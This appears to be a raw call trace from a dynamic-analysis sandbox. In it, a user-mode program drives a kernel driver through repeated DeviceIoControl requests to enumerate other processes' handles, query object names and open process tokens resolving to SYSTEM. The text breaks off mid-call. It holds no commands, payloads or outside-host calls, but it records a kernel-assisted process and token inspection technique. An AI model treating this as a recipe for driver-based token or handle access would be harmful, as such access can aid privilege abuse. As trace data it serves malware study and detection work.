0x0 [0119.808] ObfDereferenceObject (Object=0xfffffa800280f350) returned 0x2 [0119.808] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.808] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.808] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0119.808] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.808] PsAcquireProcessExitSynchronization () returned 0x0 [0119.808] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.808] ObReferenceObjectByHandle (in: Handle=0xffffffff800007b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800288d9b0, HandleInformation=0x0) returned 0x0 [0119.808] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.808] PsReleaseProcessExitSynchronization () returned 0x2 [0119.808] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.808] ObQueryNameString (in: Object=0xfffffa800288d9b0, ObjectNameInfo=0xfffffa800290a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290a044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.808] ObfDereferenceObject (Object=0xfffffa800288d9b0) returned 0x2 [0119.808] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.808] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.808] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0119.809] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.809] PsAcquireProcessExitSynchronization () returned 0x0 [0119.809] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.809] ObReferenceObjectByHandle (in: Handle=0xffffffff800007bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ee7f20, HandleInformation=0x0) returned 0x0 [0119.809] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.809] PsReleaseProcessExitSynchronization () returned 0x2 [0119.809] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.809] ObQueryNameString (in: Object=0xfffffa8002ee7f20, ObjectNameInfo=0xfffffa80026a61c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026a61c4, ReturnLength=0xfffff88005163550) returned 0x0 [0119.809] ObfDereferenceObject (Object=0xfffffa8002ee7f20) returned 0x11 [0119.809] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.809] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.809] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.809] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.809] PsAcquireProcessExitSynchronization () returned 0x0 [0119.809] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.809] ObReferenceObjectByHandle (in: Handle=0xffffffff800007c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a281f0, HandleInformation=0x0) returned 0x0 [0119.809] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.809] PsReleaseProcessExitSynchronization () returned 0x2 [0119.809] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.809] ObQueryNameString (in: Object=0xfffffa8003a281f0, ObjectNameInfo=0xfffffa80028f2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028f2044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.809] ObfDereferenceObject (Object=0xfffffa8003a281f0) returned 0x2 [0119.809] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.809] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0xc8 [0119.810] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0119.810] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8007ff84f0, HandleInformation=0x0) returned 0x0 [0119.810] ObOpenObjectByPointer (in: Object=0xfffffa8007ff84f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000654) returned 0x0 [0119.810] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x19 [0119.810] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8001eb3d00 | out: TokenHandle=0xfffffa8001eb3d00*=0xc4) returned 0x0 [0119.810] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0119.810] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.810] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0119.810] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0120.942] CloseHandle (hObject=0xc4) returned 1 [0120.942] CloseHandle (hObject=0xc8) returned 1 [0120.942] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0120.943] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0120.943] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0120.943] PsAcquireProcessExitSynchronization () returned 0x0 [0120.943] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0124.267] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002eb5d80, HandleInformation=0x0) returned 0x0 [0124.267] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0124.267] PsReleaseProcessExitSynchronization () returned 0x2 [0124.267] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x18 [0124.267] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80028c56c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80028c56c4, ReturnLength=0xfffff88005163508) returned 0x0 [0124.267] ObfDereferenceObject (Object=0xfffffa8002eb5d80) returned 0x1 [0124.267] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0124.268] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0124.268] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0124.268] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0124.268] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0124.268] PsAcquireProcessExitSynchronization () returned 0x0 [0124.268] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0127.653] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002cd9880, HandleInformation=0x0) returned 0x0 [0127.653] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0127.653] PsReleaseProcessExitSynchronization () returned 0x2 [0127.653] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x19 [0127.653] ObQueryNameString (in: Object=0xfffffa8002cd9880, ObjectNameInfo=0xfffffa800288e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288e044, ReturnLength=0xfffff88005163550) returned 0x0 [0127.653] ObfDereferenceObject (Object=0xfffffa8002cd9880) returned 0x1 [0127.653] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0127.654] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0127.654] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0127.654] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0127.654] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0127.654] PsAcquireProcessExitSynchronization () returned 0x0 [0127.654] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0128.389] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002eb5ae0, HandleInformation=0x0) returned 0x0 [0128.389] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0128.389] PsReleaseProcessExitSynchronization () returned 0x2 [0128.389] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x19 [0128.389] ObQueryNameString (in: Object=0xfffffa8002eb5ae0, ObjectNameInfo=0xfffffa80029637c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80029637c4, ReturnLength=0xfffff88005163550) returned 0x0 [0128.390] ObfDereferenceObject (Object=0xfffffa8002eb5ae0) returned 0x1 [0128.390] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0128.392] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0128.392] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0128.393] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0128.393] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0128.393] PsAcquireProcessExitSynchronization () returned 0x0 [0128.393] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0128.974] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002eb5990, HandleInformation=0x0) returned 0x0 [0128.974] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0128.975] PsReleaseProcessExitSynchronization () returned 0x2 [0128.975] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x1a [0128.975] ObQueryNameString (in: Object=0xfffffa8002eb5990, ObjectNameInfo=0xfffffa8002c25044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002c25044, ReturnLength=0xfffff88005163550) returned 0x0 [0129.017] ObfDereferenceObject (Object=0xfffffa8002eb5990) returned 0x1 [0129.017] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0129.017] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0129.018] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0129.018] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0129.018] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0129.018] PsAcquireProcessExitSynchronization () returned 0x0 [0129.018] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0129.421] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002eb5840, HandleInformation=0x0) returned 0x0 [0129.421] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0129.428] PsReleaseProcessExitSynchronization () returned 0x2 [0129.429] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x1a [0129.429] ObQueryNameString (in: Object=0xfffffa8002eb5840, ObjectNameInfo=0xfffffa8002eef044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002eef044, ReturnLength=0xfffff88005163550) returned 0x0 [0129.462] ObfDereferenceObject (Object=0xfffffa8002eb5840) returned 0x1 [0129.463] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0129.463] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0129.463] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0129.463] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0129.463] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0129.463] PsAcquireProcessExitSynchronization () returned 0x0 [0129.463] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0130.781] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002eb56f0, HandleInformation=0x0) returned 0x0 [0130.782] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0130.782] PsReleaseProcessExitSynchronization () returned 0x2 [0130.782] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x1b [0130.782] ObQueryNameString (in: Object=0xfffffa8002eb56f0, ObjectNameInfo=0xfffffa8002f09044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f09044, ReturnLength=0xfffff88005163550) returned 0x0 [0130.782] ObfDereferenceObject (Object=0xfffffa8002eb56f0) returned 0x1 [0130.782] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0130.782] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0130.782] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0130.782] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0130.782] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0130.782] PsAcquireProcessExitSynchronization () returned 0x0 [0130.782] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0130.864] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002cd7070, HandleInformation=0x0) returned 0x0 [0130.864] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0130.864] PsReleaseProcessExitSynchronization () returned 0x2 [0130.865] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x1b [0130.865] ObQueryNameString (in: Object=0xfffffa8002cd7070, ObjectNameInfo=0xfffffa8002f1f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f1f044, ReturnLength=0xfffff88005163550) returned 0x0 [0130.865] ObfDereferenceObject (Object=0xfffffa8002cd7070) returned 0x1 [0130.865] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0130.865] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0130.865] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0130.865] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0130.865] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0130.865] PsAcquireProcessExitSynchronization () returned 0x0 [0130.865] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0131.045] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002cd7f20, HandleInformation=0x0) returned 0x0 [0131.045] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0131.045] PsReleaseProcessExitSynchronization () returned 0x2 [0131.045] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x1b [0131.045] ObQueryNameString (in: Object=0xfffffa8002cd7f20, ObjectNameInfo=0xfffffa8002f17044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f17044, ReturnLength=0xfffff88005163550) returned 0x0 [0131.045] ObfDereferenceObject (Object=0xfffffa8002cd7f20) returned 0x1 [0131.045] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0131.045] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0131.045] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0131.045] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0131.045] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0131.045] PsAcquireProcessExitSynchronization () returned 0x0 [0131.046] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0131.648] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002cd7dd0, HandleInformation=0x0) returned 0x0 [0131.648] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0131.648] PsReleaseProcessExitSynchronization () returned 0x2 [0131.648] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x1b [0131.648] ObQueryNameString (in: Object=0xfffffa8002cd7dd0, ObjectNameInfo=0xfffffa8002f55044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f55044, ReturnLength=0xfffff88005163550) returned 0x0 [0131.648] ObfDereferenceObject (Object=0xfffffa8002cd7dd0) returned 0x1 [0131.648] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0131.649] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0131.649] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0131.649] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0131.649] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0131.649] PsAcquireProcessExitSynchronization () returned 0x0 [0131.649] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880051635d0) [0132.041] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0006f3970, HandleInformation=0x0) returned 0x0 [0132.041] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.041] PsReleaseProcessExitSynchronization () returned 0x2 [0132.041] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0132.041] ObQueryNameString (in: Object=0xfffff8a0006f3970, ObjectNameInfo=0xfffffa8002f79344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f79344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.041] ObfDereferenceObject (Object=0xfffff8a0006f3970) returned 0x1 [0132.041] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.041] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0132.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xc8 [0132.042] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0132.042] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003533060, HandleInformation=0x0) returned 0x0 [0132.042] ObOpenObjectByPointer (in: Object=0xfffffa8003533060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000868) returned 0x0 [0132.042] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7b [0132.042] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000868, DesiredAccess=0x8, TokenHandle=0xfffffa8003573300 | out: TokenHandle=0xfffffa8003573300*=0xc4) returned 0x0 [0132.042] ZwClose (Handle=0xffffffff80000868) returned 0x0 [0132.042] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.042] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0132.042] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, 